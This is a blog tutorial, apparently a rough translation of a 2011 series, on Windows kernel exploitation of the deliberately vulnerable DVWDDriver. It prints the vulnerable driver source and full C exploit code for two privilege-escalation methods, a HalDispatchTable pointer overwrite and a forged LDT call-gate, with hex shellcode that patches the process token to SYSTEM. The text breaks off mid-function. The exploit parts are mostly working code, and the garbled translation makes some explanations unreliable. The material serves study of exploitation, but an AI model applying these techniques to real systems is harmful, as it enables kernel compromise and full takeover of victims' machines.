P3nro5e · 2015/06/03 10:43

Source: http://poppopret.blogspot.com/2011/06/windows-kernel-exploitation-part-1.html

0 x00 overview


1. WTFBBQ?


Due to the variety of mitigation technologies of modern Windows operating system (ASLR, DEP, SafeSEH SEHOP, / GS…). User-mode software is becoming increasingly difficult to use. In the security community, driving security issues are becoming more and more of a concern.

In this series of articles, I try to share the results of my exploration of kernel utilization on Windows systems. Because there isn’t a lot of online documentation on this topic – and it’s not easy to understand – I’ve found publishing these articles helpful for novices like myself. Of course, the mistakes in these articles are welcome to be pointed out in the comments.

In fact, AFTER reading the chapter on Windows in “A Guide to Kernel Exploitation” (1), I decided to look into this particular driver (the author explains the classic weaknesses in drivers and how to exploit them). This Driver is called DVWDDriver- short for Damn Vulnerable Windows Driver- and the chapter is available at that address. To be honest, just reading the book without looking at the details and some additional paper in the source code won’t get you all the “dry stuff” in the book. That’s why I’m writing these articles.

In this article, I’ll describe drivers and their weaknesses, and in the next article I’ll try to share our understanding of how to exploit those weaknesses. Of course, I’m not going to make anything up, and everything described is based on available documentation. The purpose of this series of articles is to give a global overview of the different utilization methods and provide the technical details of the annotated source code

2.Damn Windows Driver — States that DVWDDriver can Control three different IOCTL (I/O Control Code) :

  • DEVICEIO_DVWD_STORE: A buffer that allows copying user-mode buffers to a global structure that stores KMD(kernel-mode driver)

  • DEVICEIO_DVWD_OVERWRITE: Allows the retrieval of buffers in kernel state. This is done by copying the buffer from the kernel state into the buffer at the given address. Yes, no checks were done on the address and you will see that there is a weakness

  • DEVICEIO_DVWD_STACKOVERFLOW: Allows buffers passed into parameters to be copied to local buffers

The first IOCTL is handled with DvwdHandleIoctlStore(), which calls the TriggerStore() function. Basically, the ProbeForRead() function checks whether the structure (including buffer and its size) points to a user-state memory address ({buffer, size}). It then calls the SetSavedData() function to copy the contents of the buffer into the global structure’s buffer (in kernel state, of course). Before copying, the function uses the ProbeForRead() routine again, but this time on the buffer pointer. It is used to check whether the buffer is also in user mode.

The DvwdHandleIoctlOverwrite() function handles the second IOCTL, which calls the TriggerOverwrite() function. TriggerStore() in the same way, this function checks whether the structure pointer passed to the argument ({buffer, size}) points to a user-mode address (address<= 0x7fffff). It then calls the GetSavedData() function (in order to copy the buffer containing the global structure into the buffer containing the structure passed into the parameter). However, there is no additional checking (to verify that the target buffer is in user mode).

The first two IOCtls allow you to exploit Arbitrary Memory Overwrite weaknesses, and we’ll see why in the next figure:

DvwdHandleIoctlStackOverflow third IOCTL () to handle, this function will be called weakness TriggerOverflow (), we will see this function is based on the stack buffer overflow vulnerabilities

3. The first weakness: overwriting arbitrary memory


We have seen that the GetSavedData() function does not check whether the pointer to the target buffer (received as a parameter) is in user state. The function copies the data stored in the global structure into the buffer. The problem is that the user does not check the pointer that the user controls. So, if the user-mode process specifies an arbitrary value – such as an address in the kernel-mode – the function ends up overriding any value in the kernel-memory range. And since it may be written to the buffer of the global structure of the KMD (with the DEVICEIO_DVWD_STORE IOCTL), we can write as much data as we want to the address. This is called Arbitrary Memory Overwrite weakness or write-What-where weakness.

This is an annotated vulnerability function source code:

#! c++ //============================================================================= // Part of the KMD vulnerable to Arbitrary overwrite //============================================================================= #define GLOBAL_SIZE_MAX 0x100 UCHAR GlobalBuffer[GLOBAL_SIZE_MAX]; ARBITRARY_OVERWRITE_STRUCT GlobalOverwriteStruct = {&GlobalBuffer, 0}; // Copy the content located at GlobalOverwriteStruct.StorePtr to // overwriteStruct->StorePtr (No check is performed to ensured that // it points to userland !!!) VOID GetSavedData(PARBITRARY_OVERWRITE_STRUCT overwriteStruct) { ULONG size = overwriteStruct->Size; PAGED_CODE(); if(size > GlobalOverwriteStruct.Size) size = GlobalOverwriteStruct.Size; // ---- VULNERABILITY ------------------------------------------------------ RtlCopyMemory(overwriteStruct->StorePtr, GlobalOverwriteStruct.StorePtr, size); // ------------------------------------------------------------------------- } // Copy a buffer located into kernel memory into a userland buffer // // stream is a pointer that should address a userland structure // type ARBITRARY_OVERWRITE_STRUCT NTSTATUS TriggerOverwrite(UCHAR *stream) { ARBITRARY_OVERWRITE_STRUCT overwriteStruct; NTSTATUS NtStatus = STATUS_SUCCESS; PAGED_CODE(); __try { // Initialize a ARBITRARY_OVERWRITE_STRUCT structure (in kernel land) RtlZeroMemory(&overwriteStruct, sizeof(ARBITRARY_OVERWRITE_STRUCT)); // Check if the pointer given in parameter is located in userland // (if it's not the case, an exception is triggered) ProbeForRead(stream, sizeof(ARBITRARY_OVERWRITE_STRUCT), TYPE_ALIGNMENT(char)); // Copy the ARBITRARY_OVERWRITE_STRUCT from userland to the newly // initialized structure located in kernel land RtlCopyMemory(&overwriteStruct, stream, sizeof(ARBITRARY_OVERWRITE_STRUCT)); // Call the vulnerable function GetSavedData(&overwriteStruct); } __except(ExceptionFilter()) { NtStatus = GetExceptionCode(); DbgPrint("[!!]  Exception Triggered: Handler body: Exception Code: %d\r\n", NtStatus); } return NtStatus; }Copy the code

In the next article, we’ll see how to exploit this weakness.

4. The second vulnerability: stack-based buffer overflows


The TriggerOverflow() function only checks if the buffer receives user-state arguments and copies user-state arguments into the local buffer. The local buffer is only 64 bytes long. Obviously this is a classic buffer overflow vulnerability because the size of the source buffer is not checked. Well, it happened in the kernel state, so it’s not very classical.

#! c++ //============================================================================= // Part of the KMD vulnerable to Stack Overflow //============================================================================= #define LOCAL_BUFF 64 NTSTATUS __declspec(dllexport) TriggerOverflow(UCHAR *stream, UINT32 len) { char buf[LOCAL_BUFF]; NTSTATUS NtStatus = STATUS_SUCCESS; PAGED_CODE(); __try { // Check if stream points to userland ProbeForRead(stream, len, TYPE_ALIGNMENT(char)); // ---- VULNERABILITY -------------------------------------------------- RtlCopyMemory(buf, stream, len); // --------------------------------------------------------------------- } __except(ExceptionFilter()) { NtStatus = GetExceptionCode(); DbgPrint("[!!]  Exception Triggered: Handler body: Exception Code: %d\\r\n", NtStatus); } return NtStatus; }Copy the code

5. Test platform


The next article will demonstrate leveraging techniques on Windows Server 2003 SP2(32-bit)

In order to quickly load driver is used here “OSR DriverLoader” tool (download address: http://bbs.pediy.com/showthread.php?t=100473&highlight=osr+loader)

Refer to 0 x00

(1] A Guide to Kernel Exploitation (Attacking the Core), by Enrico Perla & Massimiliano Oldani http://www.attackingthecore.com

(2) ProbeForRead () routine http://msdn.microsoft.com/en-us/library/ff559876 (vs. 85). Aspx

(3) OSR Driver Loader download http://bbs.pediy.com/showthread.php?t=100473&highlight=osr+loader

0x01 Using HalDispatchTable to exploit arbitrary memory overwrite weaknesses


In this article we’ll look at a presentation of ways to exploit write-What-where weaknesses in DVWDDriver. This method overrides a pointer in a kernel scheduling table. The kernel uses this table to store multiple Pointers. An example of a table:

  • SSDT(System Service Descriptor Table) nt! KeServiceDescriptorTable The address to store the system call. The kernel uses it to schedule system calls (more on that in (1)).

  • HAL Dispatch Table nt! Haldispatchtable. HAL (Hardware abstraction layer) A software layer used to isolate a system from hardware. Basically, it allows you to run the same system on a machine (with different hardware). This table stores routine Pointers used by HAL.

Here we will overwrite a specific pointer in HalDispatchTable(). Let’s look at why and how

1. NtQueryIntervalProfile () and HalDispatchTable


NtQueryIntervalProfile() and HalDispatchTable According to (3), NtQueryIntervalProfile() is an unpublished system call exported in ntDL. DLL. It calls the KeQueryIntervalProfile() function exported by the kernel executable ntosknl.exe. If we disassemble that function, we can see the following:

Therefore located in NT! Routine call complete on HalDispatchTable+0x4 address (see red box). So if we overwrite the pointer on that address — that is, the second pointer in HalDispatchTable — with our ShellCode address; Then we call the function NtQueryIntervalProfile(), which will execute our Shellcode.

2. Use methodology


Note: The GlobalOverwriteStruct used by the driver is a global structure used to store buffers and their size.

To exploit Arbitrary Memory Overwrite weaknesses, the basic idea is:

1. Use the IOCTL DEVICOIO_DVWD_STORE for DVWDDriver: the buffer that stores our shellcode address into the GlobalOverwriteStruct structure (kernel state). Remember that the address we pass to the argument must be in the user memory address space (address<= 0x7fffff), because this is checked in the IOCTL handle using the function ProbeForRead(). Okay, no problem, we’re just passing a pointer to our shellcode(which of course points to the user state)! Therefore, the structure passed to the driver contains this pointer and the buffer size is 4 bytes.

2. Then, Use the IOCTL for DVWDDriver DEVICOIO_DVWD_OVERWRITE is used to write content to the buffer (the address is in the buffer stored into the GlobalOverwriteStruct) — that is, the shellcode address added earlier — to be passed into the parameter’s address. Remember that there is no checking in the IOCTL handle at this point, so the address can be anywhere, in user or kernel mode. Therefore, we will pass the second entry address in HalDispatchTable, which is, of course, in kernel mode.

3. So in summary, we abuse IOCTL DEVICOIO_DVWD_OVERWRITE to write what we want and where we want:

  • What = address of our shellcode

  • where = nt! The address of HalDispatchTable + 0 x4

To take advantage of these types and weaknesses, it is important to understand which two components control NB: here we can cover the entire address (4 bytes) but in this case only 1 byte. In such a scenario, we need to override the HalpatchTable in the second entry of the Most Significant Byte with an address in user mode: for example, we could take 0x01. Then, you need to place the NOP SLED within 0x01000000-0x02000000 (the memory region labeled RWX) (with instructions to jump to our Shellcode at the end).

hey.. Wait a minute! I have to talk about the shellcode that we use

3. Shellcoding… Patch our access token and return to layer 3 ring


It’s not like we’re using some software in kernel mode, where we’re going to execute shellcode in kernel mode and not make any mistakes otherwise we’re going to have a blue screen. Usually used locally in the kernel, in Ring0 we have the privilege of changing the User SID with NT AUTHORITY\SYSTEM’s SID patch and the access token of the current process. Then we go back to Ring3 as fast as we can and pop the shell.

In Windows, access tokens (or just tokens) are used to describe the context security of a process or thread. In particular, it stores the User SID,Groups SIDs, and a list of privileges. Based on this information, the kernel can decide whether the requested behavior is authorized (access control). In user space, it is possible to get a handle on a token. More information about handles is given in (4). This is the structure _TOKEN detail used to describe an access token:

#! c++ kd> dt nt! _token +0x000 TokenSource : _TOKEN_SOURCE +0x010 TokenId : _LUID +0x018 AuthenticationId : _LUID +0x020 ParentTokenId : _LUID +0x028 ExpirationTime : _LARGE_INTEGER +0x030 TokenLock : Ptr32 _ERESOURCE +0x038 AuditPolicy : _SEP_AUDIT_POLICY +0x040 ModifiedId : _LUID +0x048 SessionId : Uint4B +0x04c UserAndGroupCount : Uint4B +0x050 RestrictedSidCount : Uint4B +0x054 PrivilegeCount : Uint4B +0x058 VariableLength : Uint4B +0x05c DynamicCharged : Uint4B +0x060 DynamicAvailable : Uint4B +0x064 DefaultOwnerIndex : Uint4B +0x068 UserAndGroups : Ptr32 _SID_AND_ATTRIBUTES +0x06c RestrictedSids : Ptr32 _SID_AND_ATTRIBUTES +0x070 PrimaryGroup : Ptr32 Void +0x074 Privileges : Ptr32 _LUID_AND_ATTRIBUTES +0x078 DynamicPart : Ptr32 Uint4B +0x07c DefaultDacl : Ptr32 _ACL +0x080 TokenType : _TOKEN_TYPE +0x084 ImpersonationLevel : _SECURITY_IMPERSONATION_LEVEL +0x088 TokenFlags : UChar +0x089 TokenInUse : UChar +0x08c ProxyData : Ptr32 _SECURITY_TOKEN_PROXY_DATA +0x090 AuditData : Ptr32 _SECURITY_TOKEN_AUDIT_DATA +0x094 LogonSession : Ptr32 _SEP_LOGON_SESSION_REFERENCES +0x098 OriginatingLogonSession : _LUID +0x0a0 VariablePart : Uint4BCopy the code

The list of Pointers to SIDs is stored in UserAndGroups(showing _SID_AND_ATTRIBUTES). We can retrieve the information contained in the Token as follows:

#! c++ kd> ! process 0004 Searching for Process with Cid == 4 Cid handle table at e1ed7000 with 428 entries in use PROCESS 827a6648 SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000 DirBase: 00587000 ObjectTable: e1000c60 HandleCount: 388. Image: System VadRoot 82337238 Vads 4 Clone 0 Private 3. Modified 5664. Locked 0. DeviceMap e1001070 Token e1001720 ElapsedTime 00:37:34.750 UserTime 00:00:00.000 KernelTime 00:00:01.578 QuotaPoolUsage[PagedPool] 0 QuotaPoolUsage[NonPagedPool] 0 Working Set Sizes (now,min,max) (43, 0, 345) (172KB, 0KB, 1380KB) PeakWorkingSetSize 526 VirtualSize 1 Mb PeakVirtualSize 2 Mb PageFaultCount 4829 MemoryPriority BACKGROUND BasePriority 8 CommitCharge 8 kd> ! token e1001720 _TOKEN e1001720 TS Session ID: 0 User: S-1-5-18 Groups: 00 S-1-5-32-544 Attributes - Default Enabled Owner 01 S-1-1-0 Attributes - Mandatory Default Enabled 02 S-1-5-11 Attributes - Mandatory Default Enabled Primary Group: S-1-5-18 Privs: 00 0x000000007 SeTcbPrivilege Attributes - Enabled Default 01 0x000000002 SeCreateTokenPrivilege Attributes - 02 0x000000009 SeTakeOwnershipPrivilege Attributes - [...]Copy the code

Of course, the idea is usually to replace the process pointer to the owner’s SID with the built-in NT AUTHORITY\SYSTEM SID (S-1-5-18) pointer. Group BUILTIN\Users SID (S-1-5-32-544) Patch group BUILTIN\Users SID (S-1-5-32-545) The source code is in shellcode32.c (extracted from DVWDDriver). I’ve added a number of comments to make it easier to understand.

4. Summarize…


In the utilization phase this is what we need to do:

  1. To get the HalDispatchTable offset, load the kernel executable ntokrNl.exe in user mode. Then it calculates its address in the kernel state.
  2. Retrieve the address of our Shellcode. This is usually the address of the function used for patch access tokens. It is worth noting, however, that the overridden pointer in HalDispatchTable (usually to a function) will take four arguments (before the four values are pushed: Call dword PTR [nt!HalDispatchTable+0x4]). So, we use shellcode with a function that takes four arguments, just for compatibility.
  3. Retrieve the address of the NtQueryIntervalProfile() system call in ntDLl.dll
  4. Override nt with our shellcode function address! Pointer to HalDispatchTable+0x4 Yes a pointer with 4 arguments (the token of the patch process). This will send the IOCTL 2 times by calling callingDeviceIoControl() twice in succession: DEVICOIO_DVWD_STORE and thenDEVICOIO_DVWD_OVERWRITE, as explained in Figure 2.
  5. Call the function NtQueryIntervalProfile() to trigger shellCode.
  6. Of course.. At this point the process is running under the System user, so we can pop a shell or do whatever we want!

The following is the global overview given in (2) :

5. Use code


This is the utilization code developed by the author of DVWDDriver. By the time I finished reading the code, I had added many comments to make sure I understood them all. This should become easier to understand with the last utilization, there is nothing to note here =)

#! c++ // ---------------------------------------------------------------------------- // Arbitrary Memory Overwrite exploitation ------------------------------------ // ---- HalDispatchTable pointer overwrite method ----------------------------- // ---------------------------------------------------------------------------- // Overwrite kernel dispatch table HalDispatchTable's second entry: // - STORE the address of the shellcode (pointer in kernelland, points to userland) // - OVERWRITE the second pointer in the HalDispatchTable with the address of the shellcode BOOL OverwriteHalDispatchTable(ULONG_PTR HalDispatchTableTarget, ULONG_PTR ShellcodeAddrStorage) { HANDLE hFile; BOOL ret; DWORD dwReturn; ARBITRARY_OVERWRITE_STRUCT overwrite; // Open handle to the driver hFile = CreateFile(L"\\\\.\\DVWD", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, 0, NULL); if(hFile ! = INVALID_HANDLE_VALUE) { // DEVICEIO_DVWD_STORE // -> store the address of the shellcode into kernelland (GlobalOverwriteStruct) overwrite.Size = 4; overwrite.StorePtr = (PVOID)&ShellcodeAddrStorage; ret = DeviceIoControl(hFile, DEVICEIO_DVWD_STORE, &overwrite, 0, NULL, 0, &dwReturn, NULL); // DEVICEIO_DVWD_OVERWRITE // -> copy the content of the buffer in kernelland (the address previously added) // to the location HalDispatchTableTarget (second entry in the HalDispatchTable) overwrite.Size = 4; overwrite.StorePtr = (PVOID)HalDispatchTableTarget; ret = DeviceIoControl(hFile, DEVICEIO_DVWD_OVERWRITE, &overwrite, 0, NULL, 0, &dwReturn, NULL); CloseHandle(hFile); return TRUE; } return FALSE; } typedef NTSTATUS (__stdcall *_NtQueryIntervalProfile)(DWORD ProfileSource, PULONG Interval); BOOL TriggerOverwrite32_NtQueryIntervalProfileWay() { ULONG dummy = 0; ULONG_PTR HalDispatchTableTarget; ULONG_PTR ShellcodeAddrStorage; _NtQueryIntervalProfile NtQueryIntervalProfile; // Load the Kernel Executive ntoskrnl.exe in userland and get some symbol's kernel address if(LoadAndGetKernelBase() == FALSE) { return FALSE; } // Retrieve the address of the shellcode ShellcodeAddrStorage = (ULONG_PTR)UserShellcodeSIDListPatchUser4Args; // Retrieve the address of the second entry within the HalDispatchTable HalDispatchTableTarget = HalDispatchTable + sizeof(ULONG_PTR); // Retrieve the address of the syscall NtQueryIntervalProfile within ntdll.dll NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQueryIntervalProfile"); // Overwrite the pointer in HalDispatchTable if(OverwriteHalDispatchTable(HalDispatchTableTarget, ShellcodeAddrStorage) == FALSE) { return FALSE; } // Call the function in order to launch our shellcode // kd> u nt! KeQueryIntervalProfile NtQueryIntervalProfile(2, &dummy); if (CreateChild(_T("C:\\WINDOWS\\SYSTEM32\\CMD.EXE")) ! = TRUE) { wprintf(L"Error: unable to spawn process, Error: %d\n", GetLastError()); return FALSE; } return TRUE; }Copy the code

6. w00t ?


And then try to use

DVWDExploit.exe --exploit-overwrite-profile-32
Copy the code

Refer to 0 x01


(1] SSDT Uninformed article http://uninformed.org/index.cgi?v=8&a=2&p=10

(2] Exploiting Common Flaws in Drivers, by Ruben Santamarta http://reversemode.com/index.php?option=com_content&task=view&id=38&Itemid=1

(3] NtQueryIntervalProfile(), http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Profile/NtQueryIntervalProfile.html

(4] Windows Internals, book by Mark Russinovich & David Salomon

0x02 Exploiting Arbitrary Memory Overwrite Weakness with LDT


In the previous article we saw one way to exploit the write-What-where weakness in DVWDDriver (based on overwriting a pointer to the HalDispatchTable in the kernel). This technique relies on the undisclosed system calls, and therefore there was a technical problem (at the next system updated whether there is the system call), in addition, the new technical details in this article, based on the special hardware structure GDT and LDT, they also remain the same in different editions of Windows features).

First, we need some background on GDT and LDT, so we’ll use Intel manual =)

1. Windows GDT and LDT


According to the Intel Manual (2), segmentation is implemented using segment selectors (16-bit values). In general, a logical address consists of the following:

  • An offset address, 32-bit value,
  • A segment selector with 16 bit values.

Here is a global summary of the segment and page mechanism (logical address -> linear address -> physical address) :

The figure above shows how logical addresses are translated into linear addresses (because of segmentation). Then we can see the page mechanism. Basically, it consists of linear address translation into physical addresses. This is usually a useless Intel feature. Linear address == physical address. Windows uses the page mechanism, so linear address is just another structure divided into three components. The values of those components to get the physical address are used as offsets in the array

However, we can see that the segment selector refers to an entry in a table that in a linear address space usually describes a segment (segment descriptor) : the table is GDT. Okay, but how does it work? What about LDT? Let’s go back to the Intel manual..

The GDT(global descriptor table) and (local descriptor table) we studied are two types of segment descriptor tables. We can also take a look at this map:

At each system startup, a GDT must be created. Each processor throughout the system has a single GDT (that’s why it’s called a “global” table) that can be shared with all tasks on the system. Although LDT can be used by a single task or a group of tasks that are related to each other. But it is optional; An LDT is defined as a single GDT entry (especially for a process), meaning that the entry is replaced by the GDT during a process context switch.

To give more details, GDT generally contains:

  • A pair of kernel-code and data segment descriptors, DPL=0(DPL defines privileges for referenced segments, etc.)
  • A pair of user-mode code and data segment descriptors, DPL=3
  • One TSS (task status segment),DPL=0. Read (3)
  • Three additional data segment entries
  • An arbitrary LDT entry

By default, a new process does not have any defined LDT, however it can be allocated if the process sends a command to create it. If a process has a corresponding LDT, then a pointer will be found at LdtDescriptorfield (the kernel struct _KPROCESS corresponding process) as shown below.

#! c++ kd> dt nt! _kprocess +0x000 Header : _DISPATCHER_HEADER +0x010 ProfileListHead : _LIST_ENTRY +0x018 DirectoryTableBase : [2] Uint4B +0x020 LdtDescriptor : _KGDTENTRY +0x028 Int21Descriptor : _KIDTENTRY [...]Copy the code

2. Call-Gate


Call-gate allows access to code segments with different privilege levels, and “Call-gate” facilitates the control program to control transmission between different privilege levels. They are typically used only by operating systems or executables (using privilege mechanisms).

Call-gate is a GDT or LDT portal. It is one of the special descriptors (called the Call-gate descriptor). It has the same size as the segment descriptor (8 bytes), but some components are not divided in the same way. The following figure is from (1) and clearly shows the differences:

In fact, call-gate is useful for jumping to a different segment or running (ring) with different privileges. When call-gate is called, the following is done:

  1. The processor accesses the Call-gate descriptor,
  2. By using a segment selector containing call-gate to locate the segment descriptor we ultimately want to access,
  3. It retrieves the base address of the snippet descriptor and adds the offset value of the Call-gate descriptor to it
  4. Get the linear address of the code you want (linear address of the snippet descriptor = base address + offset value)

Article (4) explains how we added Call-Gate, which allows us to run code in ring0 to ring3. So, I’m not going to repeat some of the things that have been stated in good articles, but this is just what’s going to be useful to us:

  • In the payload we’re going to execute, the segment selector subfield must reference the segment descriptor. Because if Ring0 is to have full privilege to execute it, then the kernel snippet (CS) descriptor must be referenced. The correct value is 0x0008.
  • If we want to access call-gate from user mode, “DPL” must be equal to 3.
  • “Offset” must be the address of the code we want to execute.
  • Because of call-gate, “Type” must be equal to 12.

After that, we need to know how to call our Call-Gate…

After that, we need to know the method that calls our call-gate..

First we will use the x86 instruction FAR CALL(0x9A). This is different from normal CALL because we have to specify an offset (32- bits)AND a segment selector (16- bits). In our case, we only need to place the correct value for the segment selector, AND we have to leave the index at 0x00000000. Of course, here we’re using two calls; The first Call is to get to the Call-gate descriptor and then the Call-gate descriptor points to the code that we want to execute. Let’s look at creating segment selectors:

So: * bit 0,1: we Call call-gate from the user state, so we will place the value 11 (for ring3, decimal value 3) here. * bit 2: sets the value to 1 because we will place the call-gate descriptor in the LDT; * a 3.. 15: This is the index in GDT/LDT. We put call-gate first in the LDT, so we set the value to 0 here.

3. Use methodology


Now we have introduced GDT and LDT. We can start talking about utilization.

Basically, the utilization consists of a new LDT created. We then add the new entry to the LDT – just an entry – a Call-gate descriptor (which has the correct value placed before interpreting it).

Then, in order to override the LDT descriptor with a forged LDT descriptor, we need to use the write-What-Where weakness

  • What = LDT descriptor for forged LDT,
  • Where = position of LDT in GDT. The LDT is depicted by a KGDTENTRY structure called LDTDescriptor, which, as we saw before, is an _KPROCESS node

So we can retrieve _KPROCESS (the address of ==_KPROCESS) to get the location we want to write to and add the appropriate offset (0x20 in windowsServer 2003 SP2).

Finally, we can invoke our Call-gate via FAR CALL on the first (and only) entry of the current process LDT. This will allow it to jump to our Shellcode.

4. Shellcoding


Ok, so we see how utilization works. We will reuse the Shellcode we used in the previous article (about exploiting HalDispatchTable with write-What-where weaknesses). But there’s a problem… After our payload is executed we need to return from call-gate. A FAR CALL will jump to call-gate, that is, the segment pointed to by EIP will change, so we need a FAR RET(0xCB) after execution. By doing this we can jump to the next instruction in our utilization. However, it is important to remember that the FS segment descriptor (which points to the TEB structure (thread execution block)) points to KPCR(kernel handler control area) in the kernel state rather than the user state. In fact:

• In kernel mode,FS=0x30 • In user mode,FS=0x3B

Therefore, in kernel state, FS must be set to 0x30 before executing our Shellcode, and then 0x3B after returning for the first two reasons the author of DVWDExploit has written a wrapper (ReturnFromGate) with ASM to implement those operations. This is the wrapper address (which must be placed at the offset of the Call-gate descriptor).

5. Use details


Ok, so we’ve thoroughly understood the details of this exploitation. Here’s how it works:

  1. Retrieve the payload address (named KernelPayload) executed in the kernel state, which indicates the Access Token code of the current patch process
  2. Retrieves the address of the _KPROCESS structure
  3. Retrieve the address of the LDT descriptor in GDT (located at _KPROCESS+ offset (0x20))
  4. Create a new LDT within ntDLl.dll using the ZwSetInformationProcess() system call. This is done by a function called SetLDTEnv().
  5. Put the address of the KernelPayload into the wrapper, and ReturnFromGate will call shellCode from it and then put the Wrapper into the executable memory.
  6. Create the Call-gate descriptor with a function called PrepareCallGate32(). Of course, we already know how to properly populate the Call-Gate region in order to execute code between ring0 and ring3.
  7. The PrepareLDTDescriptor32() function can be used to create the LDT descriptor (corresponding to the last LDT created)
  8. Overrides the LDT descriptor in the GDT by using a vulnerability that corresponds to a forged LDT created earlier: Store the new LDT descriptor into GlobalOverwriteStruct using the IOCTL DEVICEIO_DVWD_STORE of the DVWDDriver In GlobalOverwriteStruct – an existing LDT descriptor in the GDT, thanks to the IOCTL DEVICEIO_DVWD_OVERWRITE for DVWDDriver
  9. Then we need to force a process context switch. In fact, the LDT segment descriptor in the GDT is only updated after a context switch. All we need to do is rest for a while.
  10. Finally, make our FAR CALL to call-gate. That will trigger the wrapper execution and execute our Shellcode in kernel state
  11. When returning from our shellcode, the running process SID = NT AUTHORITY\SYSTEM, we can do whatever we want! A picture may shed some light on… =)

6. Use code


#!c++
Here is a code snippet from DVWDExploit with many comments I've added. 
// ----------------------------------------------------------------------------
// Arbitrary Memory Overwrite exploitation ------------------------------------
// ---- Method using LDT  -----------------------------------------------------
// ----------------------------------------------------------------------------


typedef NTSTATUS (WINAPI *_ZwSetInformationProcess)(HANDLE ProcessHandle, 
                       PROCESS_INFORMATION_CLASS ProcessInformationClass,  
                       PPROCESS_LDT_INFORMATION ProcessInformation,
                       ULONG ProcessInformationLength);    

// Fill the Call-Gate Descriptor -------------------------------------------------
VOID PrepareCallGate32(PCALL_GATE32 pGate, PVOID Payload) {

 ULONG_PTR IPayload = (ULONG_PTR)Payload;

 RtlZeroMemory(pGate, sizeof(CALL_GATE32));

 pGate->Fields.OffsetHigh   = (IPayload & 0xFFFF0000) >> 16;
 pGate->Fields.OffsetLow    = (IPayload & 0x0000FFFF);
 pGate->Fields.Type     = 12;   // Gate Descriptor
 pGate->Fields.Param    = 0;
 pGate->Fields.Present    = 1;
 pGate->Fields.SegmentSelector  = 1 << 3;  // Kernel Code Segment Selector
 pGate->Fields.Dpl     = 3;
}

// Setup the LDT descriptor ------------------------------------------------------
VOID PrepareLDTDescriptor32(PLDT_ENTRY pLDTDesc, PVOID LDTBasePtr) {

 ULONG_PTR LDTBase = (ULONG_PTR)LDTBasePtr;

 RtlZeroMemory(pLDTDesc, sizeof(LDT_ENTRY));

 pLDTDesc->BaseLow     = LDTBase & 0x0000FFFF;
 pLDTDesc->LimitLow     = 0xFFFF;
 pLDTDesc->HighWord.Bits.BaseHi  = (LDTBase & 0xFF000000) >> 24;
 pLDTDesc->HighWord.Bits.BaseMid = (LDTBase & 0x00FF0000) >> 16;
 pLDTDesc->HighWord.Bits.Type = 2;
 pLDTDesc->HighWord.Bits.Pres  = 1;
}


// Assembly wrapper to the payload to be able to return from the Call-Gate ------
// (using a FAR RET)
#define OFFSET_SHELLCODE 18
CHAR ReturnFromGate[]="\x90\x90\x90\x90\x90\x90\x90\x90"
       "\x60"                  // pushad       save general purpose registers
       "\x0F\xA0"              // push  fs     save FS segment register
       "\x66\xB8\x30\x00"      // mov  ax, 30h   
       // FS value is different between userland (0x3B) and kernelland (0x30)
       "\x8E\xE0"              // mov  fs, ax     
       "\xB8\x41\x41\x41\x41"  // mov  eax, @Shellcode  invoke the payload
       "\xFF\xD0"              // call  eax  
       "\x0F\xA1"              // pop   fs     restore general purpose registers
       "\x61"                  // popad        restore FS segment register
       "\xcb";                 // retf       far ret


// Assembly code that executes a CALL to 0007:00000000 ----------------------------
// (Segment selector: 0x0007, offset address: 0x00000000)
// 16-bit segment selector:
// [ 13-bit index into GDT/LDT ][0=descriptor in GDT/1=descriptor in LDT]
// [Requested Privilege Level: 00=ring0/11=ring3]
// => 0007 means: index 0 into GDT (first entry), descriptor in LDT, ring3
VOID FarCall() {
 __asm { 
   _emit 0x9A
   _emit 0x00
   _emit 0x00
   _emit 0x00
   _emit 0x00
   _emit 0x07
   _emit 0x00
 }
}

// Use the vulnerability to overwrite the LDT Descriptor into GDT ------------------
BOOL OverwriteGDTEntry(ULONG64 LDTDesc, PVOID *KGDTEntry) {

 HANDLE hFile;
 ARBITRARY_OVERWRITE_STRUCT overwrite;
 ULONG64 storage = LDTDesc;
 BOOL ret;
 DWORD dwReturn;

 hFile = CreateFile(L"\\\\.\\DVWD", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, 0, NULL);

 if(hFile != INVALID_HANDLE_VALUE) {
  overwrite.Size = 8;
  overwrite.StorePtr = (PVOID)&storage;
  ret = DeviceIoControl(hFile, DEVICEIO_DVWD_STORE, &overwrite, 0, NULL, 0, &dwReturn, NULL);

  overwrite.Size = 8;
  overwrite.StorePtr = (PVOID)KGDTEntry;
  ret = DeviceIoControl(hFile, DEVICEIO_DVWD_OVERWRITE, &overwrite, 0, NULL, 0, &dwReturn, NULL);

  CloseHandle(hFile);

  return TRUE;
 }

 return FALSE;
}


// Create a new LDT using ZwSetInformationProcess ----------------------------------
BOOL SetLDTEnv(VOID) {

 NTSTATUS retStatus;
 LDT_ENTRY eLdt;
 PROCESS_LDT_INFORMATION infoLdt; 
 _ZwSetInformationProcess ZwSetInformationProcess;

 // Retrieve the address of the undocumented syscall ZwSetInformationProcess()
 ZwSetInformationProcess = (_ZwSetInformationProcess)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "ZwSetInformationProcess");

 if(!ZwSetInformationProcess)
  return FALSE;

 // Create and initialize a new LDT
 RtlZeroMemory(&eLdt, sizeof(LDT_ENTRY));

 RtlCopyMemory(&(infoLdt.LdtEntries[0]), &eLdt, sizeof(LDT_ENTRY));
 infoLdt.Start = 0;
 infoLdt.Length = sizeof(LDT_ENTRY);

 retStatus = ZwSetInformationProcess(GetCurrentProcess(), 
             ProcessLdtInformation, 
             &infoLdt, 
             sizeof(PROCESS_LDT_INFORMATION));

 if(retStatus != STATUS_SUCCESS)
  return FALSE;

 return TRUE;
}


#define LDT_DESC_FROM_KPROCESS 0x20
ULONG64 LDTDescStorage32=0;

// Main function -------------------------------------------------------------------
BOOL LDTDescOverwrite32(VOID) {

 PVOID kprocess,kprocessLDTDesc;
 PLDT_ENTRY pLDTDesc = (PLDT_ENTRY)&LDTDescStorage32;
 PVOID ReturnFromGateArea = NULL;
 PCALL_GATE32 pGate = NULL;

 // User standard SIDList Patch
 FARPROC KernelPayload = (FARPROC)UserShellcodeSIDListPatchCallGate;

